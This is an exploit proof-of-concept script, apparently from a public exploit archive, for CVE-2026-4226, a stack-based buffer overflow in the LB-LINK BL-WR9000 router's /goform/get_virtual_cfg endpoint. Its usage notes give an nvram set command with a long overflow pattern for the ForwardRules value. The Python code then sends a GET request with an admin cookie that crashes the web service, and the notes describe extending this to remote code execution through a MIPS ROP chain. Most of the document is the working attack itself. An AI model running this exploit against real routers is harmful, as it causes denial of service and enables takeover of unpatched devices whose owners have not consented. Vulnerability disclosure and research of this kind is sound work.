#!/usr/bin/env python3 # Exploit Title: LB-LINK BL-WR9000 - Stack-based Buffer Overflow in /goform/get_virtual_cfg # CVE: CVE-2026-4226 # Date: 2026-03-16 # Exploit Author: Mohammed Idrees Banyamer # Author Country: Jordan # Instagram: @banyamer_security # Author GitHub: https://github.com/mbanyamer # Vendor Homepage: https://www.lb-link.com/ # Software Link: https://www.b-link.net.cn/downloads_16.html (firmware archives) # Affected: LB-LINK BL-WR9000 firmware V2.4.9 (and likely similar models using libshare-0.0.26.so) # Tested on: LB-LINK BL-WR9000 V2.4.9 (2023-06-20 build) # Category: Remote # Platform: Embedded (MIPS) # Exploit Type: Stack-based Buffer Overflow # CVSS: 8.8 (High) - Estimated (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H) based on VulDB EUVD-2026-12367 # Description: Unauthenticated/post-auth stack-based buffer overflow via oversized NVRAM "ForwardRules"/"VirtualRules" value parsed by bs_GetVirtualSerInfo (sub_44E8D0) using unbounded sscanf. Allows DoS (web server crash) and potential RCE with ROP on MIPS architecture. # Fixed in: No official patch known as of 2026-03-16; vendor unresponsive per VulDB # Usage: # python3 exploit.py # # Examples: # python3 exploit.py # # Options: # -- (no command-line args; edit TARGET/Cookie in code) # # Notes: # • Requires prior admin access (web/telnet/SSH) to set oversized NVRAM value # • Demonstrates reliable crash (DoS); extendable to full RCE via MIPS ROP chain # • Reachable remotely after NVRAM poisoning (e.g., via other config endpoints if chained) # # How to Use # # Step 1: # Inject malicious payload into NVRAM (via web UI, telnet, SSH, or nvram commands): # nvram set ForwardRules '192.168.0.1,1111,111,aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaezaafbaafcaafdaafeaaffaafgaafhaafiaafjaafkaaflaafmaafnaafoaafpaafqaafraafsaaftaafuaafvaafwaafxaafyaafzaagbaagcaagdaageaagfaaggaaghaagiaagjaagkaaglaagmaagnaagoaagpaagqaagraagsaagtaaguaagvaagwaagxaagyaagzaahbaahcaahdaaheaahfaahgaahhaahiaahjaahkaahlaahmaahnaahoaahpaahqaahraahsaahtaahuaahvaahwaahxaahyaahzaaibaaicaaidaaieaaifaaigaaihaaiiaaijaaikaailaaimaainaaioaaipaaiqaairaaisaaitaaiuaaivaaiwaaixaaiyaaizaajbaajcaajdaajeaajfaajgaajhaajiaajjaajkaajlaajmaajnaajoaajpaaj' # nvram commit # # Step 2: # Trigger the overflow remotely by running: # python3 exploit.py # (web interface becomes unresponsive until reboot) import requests TARGET = "http://192.168.16.1" PAYLOAD_URL = f"{TARGET}/goform/get_virtual_cfg" headers = { "Host": "192.168.16.1", "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36", "Accept": "application/json, text/javascript, */*; q=0.01", "X-Requested-With": "XMLHttpRequest", "Referer": f"{TARGET}/admin/main.html", "Cookie": "user=admin; platform=0", "Connection": "keep-alive" } print("[+] Sending trigger to /goform/get_virtual_cfg ...") try: r = requests.get(PAYLOAD_URL, headers=headers, timeout=5) print(f"Status: {r.status_code}") print(r.text[:500]) except requests.exceptions.RequestException as e: print(f"[!] Router crashed / service died: {e}")